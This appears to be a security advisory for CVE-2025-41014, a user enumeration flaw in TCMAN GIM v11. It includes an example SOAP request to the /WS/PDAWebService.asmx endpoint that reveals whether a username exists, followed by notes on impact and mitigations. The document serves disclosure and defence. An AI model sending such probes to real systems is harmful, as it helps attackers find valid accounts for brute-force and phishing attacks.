Overview
CVE-2025-41014 describes a user enumeration vulnerability affecting TCMAN GIM v11, specifically version 20250304. This vulnerability allows an unauthenticated attacker to determine if a specific user exists on the system. This is possible due to how the system handles requests to the /WS/PDAWebService.asmx endpoint.
Technical Details
The vulnerability resides in the /WS/PDAWebService.asmx endpoint. By sending a SOAP request with the soapaction GetLastDatePasswordChange and providing a username via the pda:username parameter, the system’s response differs depending on whether the provided username exists. This allows an attacker to deduce the existence of user accounts without requiring any authentication.
Specifically, an attacker can craft a SOAP request similar to the following (example):
POST /WS/PDAWebService.asmx HTTP/1.1
Host: target.com
Content-Type: text/xml; charset=utf-8
SOAPAction: "GetLastDatePasswordChange"
<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<GetLastDatePasswordChange xmlns="http://tempuri.org/">
<pda:username>testuser</pda:username>
</GetLastDatePasswordChange>
</soap:Body>
</soap:Envelope>
The response will be different if “testuser” exists on the system compared to a non-existent user. This difference is what makes the enumeration possible.
CVSS Analysis
Currently, the CVSS score for CVE-2025-41014 is listed as N/A. While a precise CVSS score is not available, the severity is also listed as N/A. However, user enumeration vulnerabilities are typically considered to have a lower severity than vulnerabilities that directly allow for unauthorized access. A CVSS score will likely be assigned by NIST in the future.
Despite the N/A designation, the potential impact should still be considered (see below).
Possible Impact
Although user enumeration by itself may not directly compromise a system, it provides valuable information to attackers. Knowing valid usernames significantly reduces the effort required for brute-force attacks or credential stuffing attacks. It also allows attackers to tailor phishing campaigns more effectively, increasing their success rate. In essence, it significantly widens the attack surface.
Mitigation or Patch Steps
The primary mitigation step is to upgrade TCMAN GIM to a version that addresses this vulnerability. Contact the vendor for the availability of a patch or updated version. In the absence of a patch, consider the following workarounds:
- Implement rate limiting: Rate limiting requests to the
/WS/PDAWebService.asmxendpoint can slow down enumeration attempts. - Modify the application logic: Change the application’s response to provide a consistent output regardless of whether the username exists. This eliminates the distinguishing factor that allows for enumeration. This option requires careful code review and testing.
- Web Application Firewall (WAF) Rule: Create a WAF rule to detect and block suspicious requests targeting the vulnerable endpoint, particularly those with repetitive username patterns.
These workarounds are not substitutes for a proper patch and should be considered temporary measures.
